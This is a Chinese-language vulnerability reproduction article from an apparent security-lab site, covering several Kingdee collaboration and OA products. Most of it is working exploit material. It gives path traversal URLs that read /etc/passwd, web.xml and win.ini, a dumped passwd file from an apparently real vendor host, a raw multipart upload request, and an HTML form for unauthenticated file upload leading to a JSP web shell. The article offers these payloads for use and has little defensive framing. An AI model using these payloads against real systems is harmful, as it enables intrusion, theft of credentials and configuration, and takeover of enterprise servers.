金蝶协同系统漏洞复现-小白-漏洞文库小世界-安全文库-NGC660 安全实验室

金蝶协同系统漏洞复现-小白

金蝶协同系统

1.软件介绍:

集成的信息门户,实现企业业务流程和资源的统一管理,提升业务协同能力。高效的业务流程,提供强大的工作流引擎,实现企业各部门业务的电子流转,快速实现企业高效管理。

存在的漏洞:

金蝶友商在线客服任意文件下载漏洞

金蝶协同系统任意文件上传漏洞

金蝶协同系统CurrentFolder任意文件读取漏洞

金蝶协同系统fileDownload任意文件下载

金蝶协同系统FCK任意文件上传

金蝶政务GSiS服务平台任意文件下载

金蝶软件 任意文件下载/读取

金蝶协同办公平台任意文件下载漏洞

金蝶协作办公系统任意文件上传getshell(无需登录)

2.漏洞复现

金蝶友商在线客服任意文件下载漏洞

漏洞地址:

http://im.youshang.com/live800/downlog.jsp?path=/&fileName=/etc/passwd

可以下载passwd文件,内容如下:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
apacat:x:1000:1000::/home/apacat:/bin/sh
update:x:0:0::/home/update:/bin/bash
nagios:x:1006:1006::/home/nagios:/bin/bash
tomcat:x:1007:1007::/home/tomcat:/bin/sh

金蝶协同系统任意文件上传漏洞

漏洞地址:

/mana/edit/attach_upload.jsp

POST /question/attach.upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: 
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df15314904c2
Accept-Encoding: gzip, deflate
Host: *********
Content-Length: 10396
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=
-----------------------------7df15314904c2
Content-Disposition: form-data; name="uploadnexturl"
/mana/edit/attachok.jsp
-----------------------------7df15314904c2
Content-Disposition: form-data; name="src"; filename="01.jspx"
Content-Type: application/octet-stream
hello!			
-----------------------------7df15314904c2
Content-Disposition: form-data; name="Submitdata"
ȷ  
-----------------------------7df15314904c2--

金蝶协同系统CurrentFolder任意文件读取漏洞

漏洞地址:

/oa/components/fck/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../webapp/WEB-INF/web.xml

漏洞描述:

CurrentFolder 参数没有过滤导致可以使用../ 溯回目录任意遍历目录。

金蝶协同系统fileDownload任意文件下载

漏洞地址:

/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml

1609315521866-63c44e37-2f7b-40a6-b6b3-4682b06ea75f

1609315540646-517efbef-e1dd-4abd-a17a-d25f2cccbfa4

金蝶协同系统FCK任意文件上传

金蝶OA系统在web.xml中配置了一个servlet Connector,是基于旧版本的fckeditor,存在任意文件上传漏洞。

1609315697866-8efc1604-8095-4847-82ff-fe43955c0758

漏洞地址:

oa//components/fck//editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

1609315745571-c36f27ac-885f-4204-9f2e-a415c090ba6e

1609315775817-9366d13f-2a20-488b-8653-0d8238e498dc

金蝶政务GSiS服务平台任意文件下载

漏洞地址:

/kdgs/portal/filedownload/download.action?filename=web.xml&webPath=/WEB-INF/
/kdgs/portal/filedownload/download.action?filename=proxool.properties&webPath=/WEB-INF/classes/

漏洞利用:注册一个普通用户,然后构造即可下载文件

金蝶EAS系统 任意文件读取

漏洞地址:

/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=../../../../../../../../../../etc/passwd

1609315805310-8fc07bec-130b-4f55-bf8c-4429bcb8f718

金蝶协同办公平台任意文件下载漏洞

漏洞地址:

/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini

1609315823912-440a4cd4-fef4-4c0c-9b1e-4da0e2efae4d

1609315836774-4071ee89-c9ad-4521-9525-478d0a83d55d

金蝶协作办公系统任意文件上传getshell(无需登录)

漏洞地址:

/kingdee/disk/uploadProcess.action?parent=1&path=/&user_id=2

生成HTML

<html>
<form action="http://**.**.**.**:8080/kingdee/disk/uploadProcess.action?parent=1&path=/&user_id=2" method="post" enctype ="multipart/form-data"> 
  <input type="file" name="file" /> 
  <input type="submit" name="upload" value="upload"/>
</form>
</html>

1609315858046-cfdc1233-aea4-4fb6-a597-175b22edd46a

最后生成的路径为:/kingdee/disk/upload/1231.jsp

请登录后发表评论

    请登录后查看回复内容